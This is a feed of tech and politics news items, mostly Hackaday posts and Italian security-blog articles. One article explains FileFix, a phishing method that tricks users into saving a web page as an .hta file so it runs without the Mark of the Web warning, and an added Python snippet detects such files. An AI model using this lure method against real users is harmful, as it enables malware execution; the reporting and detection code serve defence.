


Hack Swaps Keys for Gang Signs, Everyone Gets In


The door-unlocking mechanism, featuring a 3D printed bevel gear and NEMA 17 stepper.

How many times do you have to forget your keys before you start hacking on the problem? For [Binh], the answer was 5 in the last month, and his hack was to make a gesture-based door unlocker. Which leads to the amusing image of [Binh] in a hallway throwing gang signs until he is let in.

The system itself is fairly simple in its execution: the existing deadbolt is actuated by a NEMA 17 stepper turning a 3D printed bevel gear. It runs 50 steps to lock or unlock, apparently, then the motor turns off, so it’s power-efficient and won’t burn down [Binh]’s room.

The software is equally simple; mediapipe is an ML library that can already do finger detection and be accessed via Python. Apparently gesture recognition is fairly unreliable, so [Binh] just has it counting the number of fingers flashed right now. In this case, it’s running on a Raspberry Pi 5 with a webcam for image input. The Pi connects via USB serial to an ESP32 that is connected to the stepper driver. [Binh] had another project ready to be taken apart that had the ESP32/stepper combo ready to go so this was the quickest option. As was mounting everything with double-sided tape, but that also plays into a design constraint: it’s not [Binh]’s door.

[Binh] is staying in a Hacker Hotel, and as you might imagine, there’s been more penetration testing on this than you might get elsewhere. It turns out it’s relatively straightforward to brute force (as you might expect, given it is only counting fingers), so [Binh] is planning on implementing some kind of 2FA. Perhaps a secret knock? Of course he could use his phone, but what’s the fun in that?

Whatever the second factor is, hopefully it’s something that cannot be forgotten in the room. If this project tickles your fancy, it’s open source on GitHub, and you can check it out in action and the build process in the video embedded below.

After offering thanks to [Binh] for the tip, the remaining words of this article will be spent requesting that you, the brilliant and learned hackaday audience, provide us with additional tips.

youtube.com/embed/yNJkpo-19DI?…


hackaday.com/2025/07/02/hack-s…



Italy, as usual, the country of chatter. Work, slaves, work.


When populism creeps into universities

@Politica interna, europea e internazionale

Giuseppe Prezzolini wrote that “when they are universities they are not popular, and when they are popular they are not universities”. Replacing the adjective popular with the adjective populist, which denotes the tendency to indulge the moods of the masses by setting them against the interests of the elites, one obtains the snapshot



Online anonymity - jointly written considerations.


@Privacy Pride
Christian Bernieri's full post is on his blog: garantepiracy.it/blog/anonimat…
Pseudonyms are part of us; we need them, and we have always needed them. In battle, names disappear and only pseudonyms exist. It is the only way to avoid reprisals against the fighters' families. In art, pseudonyms are the



Subpixel Rendering For Impossibly Small Terminal Text


When it comes to text, how small is too small? The experts say a six point font is the minimum for readability, but as [James Bowman] shows us, you can get away with half of that.

The goal is to produce a 40-character display on a 24 mm x 24 mm LCD that has a resolution of 240 x 240 to show a serial terminal (or other data) on the “TermDriver2” USB-to-Serial adapter. With 24 lines, that’s a line per millimeter: very small text. Three points, to be precise, half what the experts say you need. Dividing this up into 40 columns gives a character cell of six by nine pixels. Is it enough?

The raw font on the left, the subpixel rendering on the right. For once, it’s better if you don’t click to enlarge.
Not by itself, no. That’s where the hack comes in: sub-pixel rendering. After all, a “white” pixel on an LCD is actually three elements: a red, a green, and a blue subpixel, stacked side-by-each. Drive each of those subpixels independently and 240 pixels now becomes 720. That’s plenty for a 40 column terminal.

The article discusses how, in general terms, they pulled off the subpixel rendering and kept the font as legible as possible. We think it’s a good try, though the colored fringe around the characters can be uncomfortable to look at for some people — and then we can’t forget the physical size of the characters being 1 mm tall.

If this trick were being used on a larger display with a 240-wide resolution, we’d say “yes, very legible, good job!”– but at this size? We hope we can find our reading glasses. Still, it’s a neat trick to have in your back pocket for driving low-resolution LCDs.

It may not surprise you that aside from improving legibility, subpixel rendering is also used for pixel (er, sub-pixel) art.

The full set of glyphs in their subpixel-rendered glory.


hackaday.com/2025/07/02/subpix…



Presentation of the book “A cosa serve il ricordo” by Andrea Apollonio

@Politica interna, europea e internazionale

2 July 2025, 18:00, Fondazione Luigi Einaudi, Via della Conciliazione 10, ROME. In addition to the author, the speakers will be Giuseppe Benedetto, President of Fondazione Luigi Einaudi; Rocco Gustavo Maruotti, Deputy Prosecutor and Secretary of ANM; Francesco Paolo Sisto, Deputy Minister




FLOSS Weekly Episode 839: I Want to Get Paid Twice


This week Jonathan chats with benny Vasquez about AlmaLinux! Why is AlmaLinux the choice for slightly older hardware? What is the deal with RISC-V? And how does EPEL fit in? Tune in to find out!


youtube.com/embed/5G-wIcFLrnM?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:


Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License


hackaday.com/2025/07/02/floss-…



Pig Butchering Scam: 5 criminals arrested in Spain over a $540 million fraud


Spanish authorities have arrested five people suspected of laundering $540 million through illegal cryptocurrency investments and of defrauding more than 5,000 people. The police operation, named Borrelli, was carried out with the support and coordination of Europol, as well as law enforcement agencies from Estonia, France and the United States.

Cryptocurrency investment scams are usually carried out through the romance scam (also known as pig butchering), which has become popular in recent years.

The scheme involves scammers using social engineering and contacting people (“pigs”) on social media and dating apps. Over time, the criminals gain the victims' trust by feigning friendship or romantic interest, and sometimes even by posing as the victims' real-life friends.

Once “contact” is established, at some point the criminals suggest that the victim invest in cryptocurrency, redirecting the victim to a fake website. Unfortunately, it is usually impossible to recover the funds or to receive the income promised from such “investments”. As a rule, after the “investment”, the funds are moved through numerous accounts, which makes them extremely difficult to trace.

The investigation into the fraud group's activities began in 2023. Since then, Europol's financial crime experts have assisted the Spanish authorities by coordinating the investigation and providing operational support. On the day of the operation, a cryptocurrency expert was even sent to Spain to assist the investigators.

While the methods used by the criminals are still under investigation, the police say they now understand the modus operandi of the group, which moved and hid the stolen funds through its channels in Asia.

“To carry out their fraudulent activities, the leaders of the criminal group are believed to have used a network of accomplices around the world who collected funds through cash withdrawals, bank transfers and cryptocurrency transfers,” Europol said. “Investigators suspect that the criminal organization set up a corporate and banking network based in Hong Kong that used payment gateways and accounts on various exchanges, opened in the names of different people, to receive, store and transfer funds obtained through criminal activity.”

Europol's statement specifically highlights the role of artificial intelligence in the spread of investment fraud, which is becoming increasingly sophisticated.

The article Pig Butchering Scam: 5 criminals arrested in Spain over a $540 million fraud comes from il blog della sicurezza informatica.



The president's counter-revolution


altrenotizie.org/primo-piano/1…


Israeli pilots dropped “unused bombs” on Gaza during the attacks by Iran


@Notizie dall'Italia e dal mondo
This explains the waves of powerful air strikes on the Strip, far from the Iranian front, recorded last month
The article Israeli pilots dropped “unused bombs” on Gaza during the attacks




South Korea Brought High-Rise Fire Escape Solutions To The Masses


When a fire breaks out in a high-rise building, conventional wisdom is that stairwells are the only way out. Lifts are verboten in such scenarios, while sheer height typically prevents any other viable route of egress from tall modern buildings. If the stairs are impassable, or you can’t reach them, you’re in dire peril.

In South Korea, though, there’s another option for escape. The answer involves strapping on a harness and descending down ropes hanging off the side of the building, just like in an action movie. It might sound terrifying, but these descending lifeline devices have become a common part of fire safety infrastructure across the country.

Going Down


The concept is elegantly simple—tall buildings like apartments and hotels feature compact rope escape devices that can be quickly deployed from windows or balconies. These allow people to control their descent down the exterior of a building in the event that there is no other route of escape. While fleeing a building down a rope is typically the preserve of fictional spies or trained climbers, these carefully engineered systems are designed for use by ordinary people in emergency situations.

youtube.com/embed/tboKzq3lx8M?…

The typical Korean descending lifeline comes as a kit with some simple components. It consists of a rope or cable, a friction-based descent control mechanism, and a harness system that can be donned quickly by sliding under the arms and tightening a strap. Deploying the device is relatively simple. The rope reel is attached to a large deployable hook that is firmly mounted to the building’s wall, using a screw-threaded coupling. The rope is then thrown out the window. At this point, the user merely needs to attach the harness and tighten it prior to leaving the building.
A typical lifeline descent kit, manufactured by Kfire. Credit: Kfire
When exiting the window, the user is instructed to face the wall on the way down, using their hands and/or feet to control the descent. Ultimately, though, the mechanical speed regulator ensures a safe pace of descent. The devices only allow the descent of one person at a time. However, each end of the rope has a harness. Thus, when one user has descended to ground level, the next person can grab the harness at the other end which has ascended to the window, and begin their descent. This can continue for as many people as needed.

Key to these devices is their focus on simplicity. The descent control mechanism uses a geared braking system that automatically limits the speed of descent to 1.5 meters/sec or less, preventing the user from descending too quickly even if they panic and release their grip. The lifelines are also sold in a range of different lengths to suit the heights of individual floors in a building. This is important to ensure that as the user hits the ground, the other end of the rope has carried the other harness back up to the floor for the next user. The longest variants typically sold are 45 meters in length, intended for buildings up to 15 stories tall. Limits of practicality mean that while these lifelines are useful for many buildings, they’re perhaps not applicable to taller skyscrapers where such escape would be more difficult.

The engineering challenge here isn’t just mechanical. Automatic rope descent systems are a well understood technology, as are hooks and brackets rated to carry human weight for climbing or otherwise. The real challenge comes down to human factors—in that these systems need to be something people can figure out how to use under conditions of extreme stress. The devices need to be intuitive enough that someone who has never used one before can figure it out while a fire rages behind them. It’s one thing to learn how to use a rope descent system by watching a video and trying the equipment at a calm training session. It’s another thing entirely to do so while a fire rages in the hotel hallway behind you.

While these lifeline systems are relatively simple, they’re still a lot more complicated to use than something like an airliner life jacket. Requiring an inexperienced end user to thread a fitting on a rope coupler without dropping it out the window in a panic situation is a tall ask. Still, the lifelines provide a useful additional escape option. It may not be the easiest way out of the building, or anybody’s first choice, but when there’s no other option, it’s good to have.

South Korea’s adoption of these systems reflects both the country’s high-rise-heavy urban landscape and a pragmatic approach to disaster preparedness. Many apartment buildings and hotels are now required to have these devices installed. The devices are typically mounted in weatherproof boxes near windows or on balconies, ready for deployment when traditional escape routes are compromised. In some cases, the rugged boxes the lifelines come in can even be used as a step-up to ease egress out of higher windows.

Perhaps most importantly, these systems represent a shift in traditional thinking about fire safety. In most jurisdictions, the idea of asking average people to belay down a building is considered untenable—too dangerous and too complicated. In South Korea, the lifelines are on hand, and put control back in the hands of building occupants. When every second counts and traditional escape routes have failed, having a lifeline system could mean the difference between life and death. It’s a sobering reminder that sometimes the best high-tech solution is one that lets people save themselves.



Trump's legacy. What is Trump leaving us with his presidency? Essentially rubble. The rubble of a united West, the rubble of US democracy, the rubble of a strong dollar, the rubble of a US economy, the rubble of the memory of what the US has always tried to be, without succeeding, and which it has definitively given up on. Certainly it is no longer the world's policeman now, but one more element of chaos and disintegration. And a Europe that could become stronger and more autonomous and express a continental policy of its own. Putin certainly has reason to gloat, but it is not so automatic that this works to his advantage.


What the US is doing to Ukraine now, it could one day do to us. Do we really want to depend on the US for defense? Simply, the day we are no longer useful...


Digital transition officer: duties, new delegated powers and a growing workload


@Informatica (Italy e non Italy 😁)
New responsibilities have been added to the "historic" duties defined by Article 17 of the CAD. The digital transition officer (Responsabile della transizione digitale, Rtd) is becoming the person responsible for cybersecurity, artificial intelligence and



Making a Smarter Laptop Cooler


The top surface of a laptop cooler is visible. It consists of a black plastic mesh with thirteen fans visible behind it, with a blue backlit screen at the bottom of the cooler. There is blue LED backlighting behind each fan, and around the border of the cooler.

[Bogdan Micea] uses a laptop cooler, but was a bit annoyed that his cooler would run at the same power no matter how hard the laptop was working. Rather than keep adjusting the cooler’s power manually, he automated it by installing an Arduino Pro Micro as a controller in the cooler and writing a Rust controller application for his computer.

[Bogdan]’s cooler is controlled by four buttons, which can have different functions depending on how long they’re pressed. After mapping out their functionality and minor quirks, [Bogdan] soldered four transistors in parallel with the buttons to let the Arduino simulate button presses; another four Arduino pins accept input from the buttons to monitor their state. The Arduino USB port connects to the cooler’s original USB power input, so the cooler looks superficially unchanged. When the cooler starts up, the Arduino sets it to a known state, then monitors the buttons. Since it can both monitor and control the buttons, it can notify the computer when the cooler’s state changes, or change the state when the computer sends a command.

On the computer’s part, the control software creates a system tray that displays and allows the user to change the cooler’s current activity. The control program can detect the CPU’s temperature and adjust the cooler’s power automatically, and the Arduino can detect the laptop’s suspend state and control power accordingly.

Somewhat surprisingly, this seems to be the first laptop cooler we’ve seen modified. We have seen a laptop cooler used to overclock a Teensy, though, and a laptop’s stock fans modified.


hackaday.com/2025/07/02/making…



FileFix bypasses the Mark of the Web protection in Microsoft Windows


A new method has been discovered on the Microsoft Windows operating system for bypassing a protection, allowing malicious scripts to run without any warning to the user. The technique, called FileFix, has been improved and now exploits a vulnerability in the way browsers handle saved HTML pages.

The attack was presented by a security researcher known as mr.d0x. He had previously demonstrated how the first version of FileFix works. At that time, attackers used a phishing page to convince the victim to paste a disguised PowerShell command into the Windows Explorer address bar. Once pasted, the command was executed automatically, making the attack practically invisible to the user.

The new FileFix variant is even more sophisticated. It allows the malicious script to run, bypassing the Mark of the Web (MoTW) protection, which is designed to block the execution of potentially dangerous files downloaded from the Internet. In this attack, the attacker uses social engineering techniques to convince the victim to save an HTML page using the Ctrl+S keyboard shortcut and to rename its extension to .HTA. Such files are associated with HTML Applications, a technology that is obsolete but still available in Windows.

Files with the .HTA extension are HTML-based applications that are launched automatically through the system component mshta.exe. This legitimate executable allows HTML code and embedded scripts to run with the rights of the current user. This is what makes .HTA files a useful tool for distributing malicious code.

As mr.d0x showed, when an HTML page is saved through a browser in the “Webpage, Complete” format (with MIME type text/html), the page does not receive the special MoTW security label. MoTW is usually added automatically to files downloaded from the Internet to warn the user of a potential threat and block the execution of embedded scripts. The absence of this label gives attackers a way to bypass the system's standard security mechanisms.

Once the user renames the saved file, for example to “MfaBackupCodes2025.hta”, and opens it, the malicious code embedded in the file is executed immediately without any warning or system prompt. In essence, the victim runs the malware themselves, without even realizing it.

The hardest part for attackers is the social engineering stage: convincing the user to save the page and change its extension correctly. However, as mr.d0x notes, this barrier can be overcome if the fake page is designed properly. For example, it could look like an official website asking the user to save backup codes for two-factor authentication in order to restore access to the account later. The page could contain detailed instructions, including a request to press Ctrl+S, select the “Webpage, Complete” save option and specify a file name with the .HTA extension.

If such a page looks convincing enough and the user has no in-depth security knowledge and does not notice the file extension, the likelihood of a successful attack increases significantly. For example, attackers could use a page titled “MFA Backup Codes” that suggests saving a file with the name “MfaBackupCodes2025.hta”. This approach is particularly dangerous given the low level of technical training of many users.

To protect against such attacks, experts recommend completely removing or blocking the system executable mshta.exe, which is located in the C:\Windows\System32 and C:\Windows\SysWOW64 directories. This component is practically unused in everyday tasks and can be safely disabled in most scenarios.
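
For defenders who want to see where such files already sit on a host, the following added example (not code from the article or from mr.d0x) triages .hta files by their Mark of the Web, which Windows stores on NTFS as a `Zone.Identifier` alternate data stream containing a `[ZoneTransfer]` section with a `ZoneId` value. The function names, the list of user folders and the sample records are assumptions constructed for illustration; only the file name MfaBackupCodes2025.hta comes from the article.

```python
"""Triage .hta files by Mark of the Web (MoTW). Added example; sample data is constructed."""
import os
from pathlib import PureWindowsPath

# ZoneId values Windows stores in the Zone.Identifier alternate data stream.
ZONE_NAMES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
              3: "Internet", 4: "Restricted Sites"}
# Folders where a browser "Save as" typically lands (assumption for this example).
USER_DROP_DIRS = {"downloads", "desktop", "documents"}


def parse_zone_id(stream_text):
    """Return the ZoneId from Zone.Identifier text, or None if absent or malformed."""
    if not stream_text:
        return None
    in_section = False
    for raw in stream_text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[zonetransfer]"
        elif in_section and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() == "zoneid":
                try:
                    return int(value.strip())
                except ValueError:
                    return None
    return None


def read_zone_identifier(path):
    """Read the Zone.Identifier stream of a file (NTFS on Windows only)."""
    if os.name != "nt":
        return None
    try:
        with open(f"{path}:Zone.Identifier", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None  # no stream: the file carries no MoTW


def triage(path, stream_text):
    """Classify one file as (verdict, detail)."""
    win_path = PureWindowsPath(path)
    if win_path.suffix.lower() != ".hta":
        return ("not-hta", "ignored")
    zone = parse_zone_id(stream_text)
    if zone is None:
        # The case the article describes: a saved page renamed to .hta has no MoTW.
        in_drop_dir = any(p.lower() in USER_DROP_DIRS for p in win_path.parts)
        where = "user folder" if in_drop_dir else "other location"
        return ("hta-without-motw", f"{where}; no MoTW warning on open")
    if zone >= 3:
        return ("hta-from-internet", f"zone {zone} ({ZONE_NAMES.get(zone, 'unknown')})")
    return ("hta-local-zone", f"zone {zone} ({ZONE_NAMES.get(zone, 'unknown')})")


def scan_records(records):
    """records: iterable of (path, stream_text). Return only the files worth reviewing."""
    findings = []
    for path, stream_text in records:
        verdict, detail = triage(path, stream_text)
        if verdict in ("hta-without-motw", "hta-from-internet"):
            findings.append((path, verdict, detail))
    return findings


def scan_directory(root):
    """Walk a directory on a Windows host and triage every file found."""
    records = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(folder, name)
            records.append((full, read_zone_identifier(full)))
    return scan_records(records)


# Constructed sample records: (path, Zone.Identifier content or None).
SAMPLE_RECORDS = [
    (r"C:\Users\alice\Downloads\MfaBackupCodes2025.hta", None),
    (r"C:\Users\alice\Downloads\setup.hta",
     "[ZoneTransfer]\r\nZoneId=3\r\nHostUrl=https://files.example.test/setup.hta\r\n"),
    (r"C:\Users\alice\Documents\report.html", None),
    (r"C:\Tools\inventory.hta", "[ZoneTransfer]\r\nZoneId=1\r\n"),
]

if __name__ == "__main__":
    for path, verdict, detail in scan_records(SAMPLE_RECORDS):
        print(f"{verdict:18} {path}  ({detail})")
```

On a Windows host, `scan_directory` can be pointed at a user profile; a missing MoTW on an .hta file is a reason to review it, not proof that it was created locally.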

The article FileFix bypasses the Mark of the Web protection in Microsoft Windows comes from il blog della sicurezza informatica.



What it means that Microsoft Authenticator is about to drop passwords


@Informatica (Italy e non Italy 😁)
Microsoft Authenticator no longer allows new passwords to be saved and, over the coming weeks, will impose further limits in order to push the use of authentication systems considered more secure. What is happening, why, and what to do
The article What it means that Microsoft Authenticator is about to



How defense is changing with the new Rtx-Shield AI alliance

@Notizie dall'Italia e dal mondo

In a sector where speed of adaptation has become an operational advantage, the collaboration between Rtx (formerly Raytheon Technologies), a traditional giant of the defense industry, and Shield AI, an emerging Silicon Valley company backed by venture capital, is an emblematic case of the convergence between



Hybrid warfare: Russian recruitment of young Ukrainians via Telegram is on the rise


@Informatica (Italy e non Italy 😁)
A 16-year-old Ukrainian was arrested last week on charges of spying for Russia. Russia's new hybrid warfare tactic recruits hundreds of vulnerable minors via Telegram, including orphans and displaced persons, used as pawns in a



Why The Latest Linux Kernel Won’t Run On Your 486 And 586 Anymore


Some time ago, Linus Torvalds made a throwaway comment that sent ripples through the Linux world. Was it perhaps time to abandon support for the now-ancient Intel 486? Developers had already abandoned the 386 in 2012, and Torvalds openly mused if the time was right to make further cuts for the benefit of modernity.

It would take three long years, but that eventuality finally came to pass. As of version 6.15, the Linux kernel will no longer support chips running the 80486 architecture, along with a gaggle of early “586” chips as well. It’s all down to some housekeeping and precise technical changes that will make the new code inoperable with the machines of the past.

Why Won’t It Work Anymore?

The kernel has had a method to emulate the CMPXCHG8B instruction for some time, but it will now be deprecated.
The big change is coming about thanks to a patch submitted by Ingo Molnar, a long time developer on the Linux kernel. The patch slashes support for older pre-Pentium CPUs, including the Intel 486 and a wide swathe of third-party chips that fell in between the 486 and Pentium generations when it came to low-level feature support.

Going forward, Molnar’s patch reconfigures the kernel to require CPUs have hardware support for the Time Stamp Counter (RDTSC) and CMPXCHG8B instructions. These became part of x86 when Intel introduced the very first Pentium processors to the market in the early 1990s. The Time Stamp Counter is relatively easy to understand—a simple 64-bit register that stores the number of cycles executed by the CPU since last reset. As for CMPXCHG8B, it’s used for comparing and exchanging eight bytes of data at a time. Earlier Intel CPUs got by with only the single-byte CMPXCHG instruction. The Linux kernel used to feature a piece of code to emulate CMPXCHG8B in order to ease interoperability with older chips that lacked the feature in hardware.

The changes remove around 15,000 lines of code. Deletions include code to emulate the CMPXCHG8B instruction for older processors that lacked the instruction, various emulated math routines, along with configuration code that configured the kernel properly for older lower-feature CPUs.

Basically, if you try to run Linux kernel 6.15 on a 486 going forward, it’s just not going to work. The kernel will make calls to instructions that the chip has never heard of, and everything will fall over. The same will be true for machines running various non-Pentium “586” chips, like the AMD 5×86 and Cyrix 5×86, as well as the AMD Elan. It’s likely even some later chips, like the Cyrix 6×86, might not work, given their questionable or non-existent support of the CMPXCHG8B instruction.

Why Now?


Molnar’s reasoning for the move was straightforward, as explained in the patch notes:

In the x86 architecture we have various complicated hardware emulation
facilities on x86-32 to support ancient 32-bit CPUs that very very few
people are using with modern kernels. This compatibility glue is sometimes
even causing problems that people spend time to resolve, which time could
be spent on other things.


Indeed, it follows on from earlier comments by Torvalds, who had noted how development was being held back by support for the ancient members of Intel’s x86 architecture. In particular, the Linux creator questioned whether modern kernels were even widely compatible with older 486 CPUs, given that various low-level features of the kernel had already begun to implement the use of instructions like RDTSC that weren’t present on pre-Pentium processors. “Our non-Pentium support is ACTIVELY BUGGY AND BROKEN right now,” Torvalds exclaimed in 2022. “This is not some theoretical issue, but very much a ‘look, ma, this has never been tested, and cannot actually work’ issue, that nobody has ever noticed because nobody really cares.”
Intel kept i486 chips in production for a good 18 years, with the last examples shipped out in September 2007. Credit: Konstantin Lanzet, CC BY-SA 3.0
Basically, the user base for modern kernels on old 486 and early “586” hardware was so small that Torvalds no longer believed anyone was even checking whether up-to-date Linux even worked on those platforms anymore. Thus, any further development effort to quash bugs and keep these platforms supported was unjustified.

It’s worth acknowledging that Intel made its last shipments of i486 chips on September 28, 2007. That’s perhaps more recent than you might think for a chip that was launched in 1989. However, these chips weren’t for mainstream use. Beyond the early 1990s, the 486 was dead for desktop users, with an IBM spokesperson calling the 486 an “ancient chip” and a “dinosaur” in 1996. Intel’s production continued on beyond that point almost solely for the benefit of military, medical, industrial and other embedded users.
Third-party chips like the AMD Elan will no longer be usable, either. Credit: Phiarc, CC-BY-SA 4.0
If there was a large and vocal community calling for ongoing support for these older processors, the kernel development team might have seen things differently. However, in the month or so that the kernel patch has been public, no such furore has erupted. Indeed, there’s nothing stopping these older machines still running Linux—they just won’t be able to run the most up-to-date kernels. That’s not such a big deal.

While there are usually security implications around running outdated operating systems, the simple fact is that few to no important 486 systems should really be connected to the Internet anyway. They lack the performance to even load things like modern websites, and have little spare overhead to run antiviral software or firewalls on top of whatever software is required for their main duties. Operators of such machines won’t be missing much by being stuck on earlier revisions of the kernel.

Ultimately, it’s good to see Linux developers continuing to prune the chaff and improve the kernel for the future. It’s perhaps sad to say goodbye to the 486 and the gaggle of weird almost-Pentiums from other manufacturers, but if we’re honest, few to none were running the most recent Linux kernel anyway. Onwards and upwards!


hackaday.com/2025/07/02/why-th…



Amazon toys too much with the Switch 2's price and Nintendo is furious

The article comes from #StartMag and is reshared on the Lemmy community @Informatica (Italy e non Italy 😁)
A brawl between two hi-tech giants: Nintendo has reportedly pulled its products from Amazon's US site, irked by the e-commerce company's failure to act on lower prices



Thiel (Palantir) and Luckey (Anduril) bet on Erebor to replace Silicon Valley Bank

The article comes from #StartMag and is reshared on the Lemmy community @Informatica (Italy e non Italy 😁)
Together with Palmer Luckey (co-founder of the defense startup Anduril), also Founders Fund, the venture capital fund of Peter Thiel (founder of




“She won't come back”: Alawite women abducted from the streets of Syria


@Notizie dall'Italia e dal mondo
After the fall of Assad in Syria, violence has been unleashed against the former president's community. Numerous Alawite women have been targeted, abducted and often taken out of the country
The article “She won't come back”: Alawite women abducted from the streets of Syria comes from Pagine



Hawaiian Airlines under hacker attack, systems compromised


Hawaiian Airlines, one of the 10 largest commercial airlines in the United States, is investigating a cyberattack that compromised some of its systems. Experts believe the group Scattered Spider may be responsible for the breach.

In an official statement, the company reports that the cyber incident did not compromise flight safety and that all the relevant authorities have already been informed. Hawaiian Airlines has also brought external cybersecurity experts into the investigation, who are currently helping to assess the impact of the attack and restore the affected systems.

“Hawaiian Airlines is resolving a cybersecurity issue that has impacted several of our IT systems. Our highest priority is the safety of our customers and employees. We have taken steps to protect operations, and all flights are operating normally and safely,” the airline said.

A banner on the airline's website states that the incident had no impact on flight safety or schedules. A similar message is posted on the website of Alaska Airlines, owned by Alaska Air Group, the company that acquired Hawaiian Airlines last year.

It is currently unclear whether Hawaiian Airlines' systems were hit by ransomware that encrypted them or whether they were shut down to prevent cyberattacks. No hacker group has yet claimed responsibility for the attack. It is worth noting that the Canadian airline WestJet suffered a similar attack earlier this month, and that attack affected the availability of the airline's app and website.

Meanwhile, over the weekend, the FBI, Google Mandiant and Palo Alto Networks issued a joint warning about the activity of the hacker group Scattered Spider, which may now be targeting companies in the aviation and transportation sectors. The FBI noted that Scattered Spider typically relies on social engineering to gain access to victims' systems and that the hackers may also target trusted airline vendors and contractors. According to Axios, meanwhile, the WestJet attack mentioned above may also be the work of Scattered Spider.

The article Hawaiian Airlines under hacker attack, systems compromised comes from il blog della sicurezza informatica.



The Fake News Factory


KIA ORA. IT'S WEDNESDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and this week's edition comes to you from New Zealand. I'm taking a couple weeks off, so the next newsletter (for paying subscribers) will hit inboxes on July 14.

I'm trying something different this week.

Ahead of the 2024 global megacycle of elections, I had the idea of explaining the links between the digital tactics that have now become all too common in how politicians get elected from Pakistan and Portugal to the United Kingdom and the United States.

Life, however, got in the way. (The best I did was this package around artificial intelligence, disinformation and elections.) So, I'm taking another crack at how we all now live in the Fake News Factory.

Let's get started:


The democratization of online tools and tactics


THE LAST DECADE REPRESENTED the second generation of social media. It was an era where the shine had significantly come off Facebook and Twitter (now X.) It was a time of repeated whistleblower reports about tech giants understanding how their content algorithms were pushing people toward polarizing and extremist content. It was a time of serious commercialization of these platforms by politicians eager to bombard would-be voters with billions of dollars of collective ad buys.

That era is now over. It's not that Facebook and YouTube are no longer important. They are — especially YouTube, which has transformed itself into a global rival for traditional television in a way that has upended the advertising industry and fundamentally reshaped how anyone under 30 years old consumes video content. But where the 2015-2025 period was primarily defined by the dominance of a small number of Silicon Valley platforms, we're now in an era where fringe platforms, niche podcasts and the likes of vertical dramas have divided people into small online communities that rarely interact with each other.

This was happening before 2025. But we have reached an inflection point in how the online information ecosystem works. It has now shattered into a million pieces where people gravitate to like-minded individuals in siloed platforms. There is no longer a collective set of facts or events that form the foundation for society. Instead, most of us seek out opinions that already reflect our worldview, often demonizing those who we disagree with in an "othering" that only fuels polarization, misunderstanding and, potentially, offline harm.

And you thought this would be an uplifting newsletter.


This bifurcation in how people consume online content has made it next to impossible for foreign interference operations to flourish like they once did. See, there's a positive point. Even two years ago, the Russians could flood the zone with Kremlin talking points and receive a significant bump in online interactions. The Chinese never went in for that sort of thing — though have progressively targeted Western audiences mostly with overt propaganda in support of the Chinese Communist Party.

Now, such efforts are almost certainly doomed to fail. The siloing of social media usage has been married with a need for authenticity — that sense of belonging and insider knowledge that can only come from deep roots in communities that can smell out an imposter from a mile off. That authenticity is something that foreign (covert) campaigns routinely do badly at. State-backed operations don't know the insider lingo; they don't have the long-standing credibility built up over months/years; and they don't have personal ties required to fully embed in the balkanization of social media.

But where state-backed actors remain a threat is in the amplification of existing domestic influencers often by automated bot-nets and other AI-powered tools aimed at juicing social media giants' recommender systems. The companies say they are on top of these covert tactics. But every time there's a massive global political event (or local election), Kremlin-backed narratives keep popping up in people's feeds — often via local influencers whose views just happen to align with Moscow. These individuals are mostly not connected with Russia. But they have likely received a boost from Kremlin-aligned groups seeking to spread those messages to the widest audience possible.

It's about domestic, not foreign


IN TRUTH, STATE-BACKED ACTORS are a very public sideshow to the main event driving ongoing toxicity within the information environment: domestic actors. Be they influencers, scammers, politically-aligned media or, ahem, politicians, they are the key instigator for much of the current. Many of these domestic players see some form of benefit from spreading harm, falsehoods and, in some cases, illegality online. That, it should be added, is then amplified by social media platforms' algorithms that have been programmed to entice people to stay on these networks, often by promoting the most divisive content possible.

Such a dynamic has been around for years. It isn't a left- or right-wing issue — though repeated studies have shown that conservative social media users promote more falsehoods than their liberal counterparts. It's a basic fact that domestic social media users both know their audience better than foreign influence campaigns and that they have greater credibility with siloed local audiences than Russia, China or Iran.

What has shifted, though, is the ability for almost anyone to run a domestic influence campaign — or, you know, a mainstream political campaign — as if they had the resources of the Kremlin-backed Internet Research Agency. Over the last five years, the toolkit required to skew social media has become readily accessible and significantly cheaper than it once was. That has been spurred on even more through the rapid growth of AI-enabled tools (more on that below.) But everything from a Bangladesh-based bot farm to a Philippines-based dark arts public relations has now become an off-the-shelf product that can be bought via a few clicks on a public-facing website.

This shift has not gone unnoticed by criminals. In 2025, the highest volume of attacks in the (Western) information environment now come from those seeking to dupe social media users out of money — and not to alter their political allegiances. Yes, the impact on politics can have significantly bigger effects. But the rise of "financial disinformation" in terms of frauds and scams promoted on social media has reached pandemic proportions.

Collectively, such digital efforts to swindle people out of money now cost billions of dollars a year, and even that is likely a significant underestimate. It's also directly linked to a crime (aka fraud) when scammers buy social media adverts to convince people to sign up to Ponzi and other get-rich-quick schemes. I did a quick search, via Meta's ad library in six different countries, for such financial scams, and found a prolific amount of advertising that promoted such disinformation. Some of it was blatantly illegal, some of it was not (I'm not linking to it to avoid amplification.) But the fact such scam artists are openly flaunting the law should be a worry for us all.

This democratization of disinformation has only gone from bad to worse with AI tools. Be it cloning technology to spoof a victim's voice, AI-generated images attacking a political opponent or next-generation video software that creates falsehoods from scratch within minutes, the cost for generating toxicity, hate and polarization is now almost zero. Yes, these tools can also generate joy, laughter and entertainment. But the last six months have seen a rapid rise in AI-generated slop that is quickly moving from being easy to detect to being indistinguishable from the real thing.

Trust me, I'm a regulator


THIS YEAR MARKS THE FIRST TIME ON RECORD that several countries' online safety rulebooks are in full operation. Yes, Australia got things started almost five years ago. But with the European Union's Digital Services Act and the UK's Online Safety Act, the Western world has the first signs of what a well-resourced regulatory environment looks like when it comes to keeping people safe online.

Sigh.

It's not that the European Commission and Ofcom (disclaimer: I sit on an independent advisory committee at the British regulator, so anything I say here is done so in a personal capacity) aren't doing their best. They are. It's just both are fighting a 2020 war against perceived threats within the online information environment, and just haven't kept pace with the fast-evolving tactics, some of which I outlined above.

